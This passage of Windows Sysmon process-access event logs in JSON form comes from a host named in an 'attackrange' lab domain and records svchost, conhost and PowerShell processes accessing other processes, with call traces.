ystem32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.015\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.015","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.015\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: 